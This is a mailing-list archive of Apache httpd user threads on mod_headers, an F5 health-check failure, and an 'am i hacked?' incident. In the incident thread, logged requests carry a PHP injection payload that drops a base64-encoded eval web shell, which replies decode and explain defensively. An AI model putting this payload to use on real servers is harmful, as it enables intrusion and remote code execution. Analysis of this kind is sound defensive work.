[users@httpd] Apache 2.2 mod_headers question

[mjk]

I have spent 8+hours scouring the web, reviewing the Apache Httpd Cookbook,
the Definitive Reference, and the 2.2 documentation for mod_headers,
mod_proxy and core.


CONFIGURATION:
Apache Version:
Server version: Apache/2.2.15 (Unix)
Server built:   Jul 18 2016 15:24:00

SSL offloading happens before the requests gets to Apache, which proxies
http traffic to Apache on port 80.

The Apache VirtualHost config in question does not have a ServerName or
ServerAlias configured, and is configured to listen on port 80.

SITUATION
I have a Rewrite rule issuing a 301 redirect which uses flags [NC,R=301,L]
-  which redirects to the correct hostname, but using http as the protocol.

I have a mod_headers rule to try to deal with this:   Header always edit
Location ^http://(.*) https://$1
This rule is getting completely ignored.


If I add a wholly new Header like:Header always add SillyHeader
SillyHeaderValue
the header DOES get added.


Does anyone know why the   "Header always edit"   rule is getting ignored?

Thank you,

--mjk

Re: [users@httpd] Apache 2.2.32 failing F5 health check

[Eric Covener]

On Mon, Feb 6, 2017 at 8:40 PM,   wrote:
> broken apache httpd version 2.2.32:
>
> openssl s_client -connect : -pause
>
> when paused input this.
>
> GET /login/healthcheck/content_check.wecv HTTP/1.0
>
> Host: 

s_client doesn't send CRLF unless you pass -crlf.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

RE: [users@httpd] Apache 2.2.32 failing F5 health check

[Bharath.C.Kolla]

broken apache httpd version 2.2.32:
openssl s_client -connect : -pause
when paused input this.
GET /login/healthcheck/content_check.wecv HTTP/1.0
Host: 

You get bad request back from apache httpd
HTTP/1.1 400 Bad Request
Working  apache httpd version 2.2.31:
openssl s_client -connect : -pause
when paused input this.
GET /login/healthcheck/content_check.wecv HTTP/1.0
Host: 

You get content_check.wecv page from webserver with http code 200.


Bharath Kolla

From: Daniel [mailto:dferra...@gmail.com]
Sent: Monday, February 06, 2017 1:50 PM
To: 
Subject: Re: [users@httpd] Apache 2.2.32 failing F5 health check

Oh really? Enable mod_dumpio and show us the GET from your F5 "pings".

2017-02-06 21:34 GMT+01:00 
mailto:bharath.c.ko...@wellsfargo.com.invalid>>:
This issue is different from the CR LF issue. We checked for any 
delimiters/spaces etc. The F5 health checks work fine with 2.2.31 on the same 
server, without any change in the configuration, but when we upgrade to 2.2.32, 
apache reports a 400 error.

Bharath Kolla



-Original Message-
From: Eric Covener [mailto:cove...@gmail.com]
Sent: Saturday, February 04, 2017 5:00 PM
To: users@httpd.apache.org
Subject: Re: [users@httpd] Apache 2.2.32 failing F5 health check

On Sat, Feb 4, 2017 at 4:56 PM,  
mailto:bharath.c.ko...@wellsfargo.com.invalid>>
 wrote:
> We recently upgraded to Apache 2.2.32 and are facing issues with F5
> health check. The openssl s_client from F5 to check Apache web
> server’s health is being returned by the 2.2.32 server as 400 error.
> We don’t see the issue with 2.2.31 however. The application can be
> accessed with web server listen address, but when accessed through the
> VIP, it sends a 400. Any help in debugging this issue will be much 
> appreciated.


Someone recently reported a subset of their F5 health checks were using LF line 
endings instead of CR LF.

--
Eric Covener
cove...@gmail.com

-
To unsubscribe, e-mail: 
users-unsubscr...@httpd.apache.org
For additional commands, e-mail: 
users-h...@httpd.apache.org



--
Daniel Ferradal
IT Specialist

email dferradal at gmail.com
linkedin 
es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

[Wim Lewis]

On 2/6/2017 8:36 AM, Jack Swan wrote:
> What upsets me is that these two requests have statuscode 200, which mean it 
> was successfull.

As Jonesy points out, it's normal for the web server to simply ignore a 
request's query-string in a request where it wouldn't mean anything. So Apache 
is happily returning the result of "GET /" and ignoring the malicious probe.

If you don't have PHP installed, you're safe from whatever this is. If the user 
your webserver runs as can't write to the documentroot or configuration 
directory, you're safe from whatever this is. 



-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] Re: am i hacked ?

[Jonesy]

On Mon, 6 Feb 2017 20:17:00 +0100 (CET), Lentes, Bernd wrote:

> Why has the request status code 200 ?

Because the request was for the root document: "/"
The rest of the crap was a malicious query string that -- if
your root doc was .php, AND if your php version was vulnerable --
_might_ have executed and done damage.

So, 200 == it successfully fetched the root document.

Jonesy


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Apache 2.2.32 failing F5 health check

[Daniel]

Oh really? Enable mod_dumpio and show us the GET from your F5 "pings".

2017-02-06 21:34 GMT+01:00 :

> This issue is different from the CR LF issue. We checked for any
> delimiters/spaces etc. The F5 health checks work fine with 2.2.31 on the
> same server, without any change in the configuration, but when we upgrade
> to 2.2.32, apache reports a 400 error.
>
> Bharath Kolla
>
>
>
> -Original Message-
> From: Eric Covener [mailto:cove...@gmail.com]
> Sent: Saturday, February 04, 2017 5:00 PM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Apache 2.2.32 failing F5 health check
>
> On Sat, Feb 4, 2017 at 4:56 PM,  
> wrote:
> > We recently upgraded to Apache 2.2.32 and are facing issues with F5
> > health check. The openssl s_client from F5 to check Apache web
> > server’s health is being returned by the 2.2.32 server as 400 error.
> > We don’t see the issue with 2.2.31 however. The application can be
> > accessed with web server listen address, but when accessed through the
> > VIP, it sends a 400. Any help in debugging this issue will be much
> appreciated.
>
>
> Someone recently reported a subset of their F5 health checks were using LF
> line endings instead of CR LF.
>
> --
> Eric Covener
> cove...@gmail.com
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>


-- 
*Daniel Ferradal*
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal

RE: [users@httpd] Apache 2.2.32 failing F5 health check

[Bharath.C.Kolla]

This issue is different from the CR LF issue. We checked for any 
delimiters/spaces etc. The F5 health checks work fine with 2.2.31 on the same 
server, without any change in the configuration, but when we upgrade to 2.2.32, 
apache reports a 400 error.

Bharath Kolla



-Original Message-
From: Eric Covener [mailto:cove...@gmail.com] 
Sent: Saturday, February 04, 2017 5:00 PM
To: users@httpd.apache.org
Subject: Re: [users@httpd] Apache 2.2.32 failing F5 health check

On Sat, Feb 4, 2017 at 4:56 PM,   wrote:
> We recently upgraded to Apache 2.2.32 and are facing issues with F5 
> health check. The openssl s_client from F5 to check Apache web 
> server’s health is being returned by the 2.2.32 server as 400 error. 
> We don’t see the issue with 2.2.31 however. The application can be 
> accessed with web server listen address, but when accessed through the 
> VIP, it sends a 400. Any help in debugging this issue will be much 
> appreciated.


Someone recently reported a subset of their F5 health checks were using LF line 
endings instead of CR LF.

--
Eric Covener
cove...@gmail.com

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Kent Frazier]

If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).


test =""" 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> 
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

> HTTP/1.1" 200 90"""
import urllib.parse
print(urllib.parse.unquote(test))
import base64
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

It yields...
python unquote.py
 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> 
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo 
'->|';file_put_contents($_SERVER['DOCUME
> 
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo 
'|<-';

> HTTP/1.1" 200 90
b''

I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.


python getAbuseEmail.py 91.200.12.33
['n...@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

just in the moment i found two very weird entries in may access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET 
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
 HTTP/1.1" 200 90

What upsets me is that these two requests have statuscode 200, which mean it 
was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? 
Does anyone understand what happened here ? It's apache 2.2.3 64bit.

Thanks for any hint.

Bernd




-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

- On Feb 6, 2017, at 8:22 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

>> OK. I think i understand most of it.
>> First the attacker sets some values appropriate for him. Then he tries to 
>> create
>> a file webconfig.txt.php and to write
>>  in it.
>> Fortunately wwwrun can't write in /sr/www ... , following
>> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
>> If he could create the file, then he is able to sent arbitrary stuff to it 
>> which
>> is executed by eval.
>> 
>> Some things are still unclear for me:
>> 
>> What is the purpose of the two echos ?
>> Why has the request status code 200 ?
>> What is the purpose of the 1 direct behind the question mark ?
>> What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm 
>> not
>> a php developer).
>> 
> 
> The @ in front of the function calls silence the errors:
> http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in
> 

Beside keeping apache and the OS fresh, what do you think of mod_security 
and/or AppArmor as an additional layer of security ?
I read that mod_security is quite complicated.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

> OK. I think i understand most of it.
> First the attacker sets some values appropriate for him. Then he tries to 
> create
> a file webconfig.txt.php and to write
>  in it.
> Fortunately wwwrun can't write in /sr/www ... , following
> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
> If he could create the file, then he is able to sent arbitrary stuff to it 
> which
> is executed by eval.
> 
> Some things are still unclear for me:
> 
> What is the purpose of the two echos ?
> Why has the request status code 200 ?
> What is the purpose of the 1 direct behind the question mark ?
> What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm 
> not
> a php developer).
> 

The @ in front of the function calls silence the errors:
http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in

Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

- On Feb 6, 2017, at 6:32 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:
> 
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>> 
>> 
>> 
>> I didn't decode the remaining lines. I think they're just trying to do the 
>> same
>> thing.
>> 
>> 
> 
> You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is
> helpful.
> 
> 

OK. I think i understand most of it.
First the attacker sets some values appropriate for him. Then he tries to 
create a file webconfig.txt.php and to write
 in it.
Fortunately wwwrun can't write in /sr/www ... , following 
http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
If he could create the file, then he is able to sent arbitrary stuff to it 
which is executed by eval.

Some things are still unclear for me:

What is the purpose of the two echos ?
Why has the request status code 200 ?
What is the purpose of the 1 direct behind the question mark ?
What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm not 
a php developer).


Bernd

 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Eric Covener]

On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog  wrote:
> I see these type of attack strings all the time on Nginx except Nginx gives
> a 403. Apache is notoriously bad with security and giving 200 ok responses
> makes you  yourself. A reason  I and many other people have switched.
> User support on this list was also non existent when I ran into serious SSL
> problems with 2.4 that until today have been ignored and unanswered.

Was this your serious problem:

I am hoping someone can please give me a more concise description of
what the socache_shmcb module is and what it actually does. The
documentation at
https://httpd.apache.org/docs/2.4/mod/mod_socache_shmcb.html is very
vague and in 2 years has not changed. Google searches do not reveal
much information other than people on forums saying enable the module
for better performance and what not.

I just cannot get my head around what it is actually really designed
to do and if one was to use it how to configure it. Guess as I said it
will first help to know what it actually is.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:

> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
> 
> 
> 
> I didn't decode the remaining lines. I think they're just trying to do the 
> same
> thing.
> 
> 

You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is 
helpful.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Mitchell Krog]

I see these type of attack strings all the time on Nginx except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 ok responses
makes you  yourself. A reason  I and many other people have switched.
User support on this list was also non existent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson"  wrote:

>
>
> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> 
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do
>>> the same
>>> thing.
>>>
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
>> belongs to root and user wwwrun
>> is not allowed to write there.
>>
>
> What seems to be happening here is that your system is being probed for
> vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes
> that it will not complain and write the string to the file
> webconfig.txt.php which the attacker would then attempt to get to with the
> real hack in the Posted contents. Are there any requests to get to that
> file?
>
> You should make sure you sanitized any input to your index.php and reject
> anything that's not expected.
>
> Ken
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [users@httpd] am i hacked ?

[Ken Robinson]

On 2017-02-06 12:08 pm, Lentes, Bernd wrote:


The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:



I didn't decode the remaining lines. I think they're just trying to do 
the same

thing.


Fortunately there is no webconfig.txt.php. And all folders in /srv/www 
belongs to root and user wwwrun

is not allowed to write there.


What seems to be happening here is that your system is being probed for 
vulnerabilities.


The attacker is sending a payload string to your index.php file in hopes 
that it will not complain and write the string to the file 
webconfig.txt.php which the attacker would then attempt to get to with 
the real hack in the Posted contents. Are there any requests to get to 
that file?


You should make sure you sanitized any input to your index.php and 
reject anything that's not expected.


Ken

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
> 
> 
> 
> I didn't decode the remaining lines. I think they're just trying to do the 
> same
> thing.
> 

Fortunately there is no webconfig.txt.php. And all folders in /srv/www belongs 
to root and user wwwrun
is not allowed to write there.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Lentes, Bernd]

- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote:

> Actually now that I re-read the requests it also looks as shellshock succesful
> attempt.
> Operative system software not updated recently either?

> 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > :

>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.

>> Do you use a very old php version as well?

Everything is old. php, OS, apache. This is to my account. It's a system i 
nearly oversaw, because we use it very rarely.
But nevertheless, it should be updated. I know. And i learn.

>>> What i find out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>>> '->|';file_put_contents($_SERVER['DOCUME
>>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>>> '|<-';

>>> Currently i don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>>> network which includes this ip.

>>> Thankful for any tip.

 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Jack Swan]

The first line is trying to create the file webconfig.txt.php in your 
DOCUMENT_ROOT directory, with the contents of the file being:



I didn't decode the remaining lines. I think they're just trying to do the same 
thing.


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re: [users@httpd] am i hacked ?


- On Feb 6, 2017, at 5:14 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
> 
> just in the moment i found two very weird entries in may access_log:
> 
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have statuscode 200, which mean it 
> was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? 
> Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
 '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';

Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the 
network which includes this ip.

Thankful for any tip.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] am i hacked ?

[Daniel]

Actually now that I re-read the requests it also looks as shellshock
succesful attempt.

Operative system software not updated recently either?

2017-02-06 17:42 GMT+01:00 Daniel :

> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd  muenchen.de>:
>
>>
>> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
>> muenchen.de wrote:
>>
>> > Hi,
>> >
>> > just in the moment i found two very weird entries in may access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have statuscode 200, which
>> mean it was
>> > successfull.
>> > The IP is from ukraine. Where can i find out what these %charcacters
>> mean ? Does
>> > anyone understand what happened here ? It's apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>> >
>>
>> What i find out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>> '->|';file_put_contents($_SERVER['DOCUME
>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>> '|<-';
>>
>> Currently i don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>> network which includes this ip.
>>
>> Thankful for any tip.
>>
>>
>> Bernd
>>
>>
>> Helmholtz Zentrum Muenchen
>> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
>> Ingolstaedter Landstr. 1
>> 85764 Neuherberg
>> www.helmholtz-muenchen.de
>> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
>> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
>> Enhsen
>> Registergericht: Amtsgericht Muenchen HRB 6466
>> USt-IdNr: DE 129521671
>>
>>
>> -
>> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
>> For additional commands, e-mail: users-h...@httpd.apache.org
>>
>>
>
>
> --
> *Daniel Ferradal*
> IT Specialist
>
> email dferradal at gmail.com
> linkedin es.linkedin.com/in/danielferradal
>



-- 
*Daniel Ferradal*
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal

Re: [users@httpd] am i hacked ?

[Daniel]

Have you tried to send those requests yourself and see what you get?

Still those requests seem to be aimed at your php framework.

Do you use a very old php version as well?

2017-02-06 17:41 GMT+01:00 Lentes, Bernd :

>
> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
> muenchen.de wrote:
>
> > Hi,
> >
> > just in the moment i found two very weird entries in may access_log:
> >
> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%
> 40set_time_limit%280%29%3B%40set_magic_quotes_runtime%
> 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%
> 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
